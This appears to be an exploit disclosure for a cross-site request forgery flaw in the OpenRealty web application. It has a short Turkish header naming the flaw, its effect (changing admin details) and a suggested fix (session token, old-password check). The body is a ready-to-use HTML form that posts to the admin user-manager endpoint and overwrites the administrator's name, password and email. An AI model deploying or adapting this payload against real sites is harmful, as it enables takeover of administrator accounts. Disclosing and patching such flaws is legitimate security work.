< ------------------- header data start ------------------- >

#############################################################

# Application Name : OpenRealty

# vulnerable Type : XSRF

# Infection : Admin bilgileri degistirilebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir , Eski sifre sorulmalidir ..!

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<form name=updateUser action=http://demo.opensourcecms.com/openrealty/admin/index.php?action=user_manager&edit=1 method=post>
<input type=hidden name=edit value=1 />
<input type=hidden name=user_first_name value=Hacker />
<input type=hidden name=user_last_name value=_iLLeqaL_ />
<input type=hidden name=edit_user_pass value=123456 />
<input type=hidden name=edit_user_pass2 value=123456 />
<input type=hidden name=user_email value=[email protected] />
<input type=submit value= O K />
</form>



< -- bug code end of -- >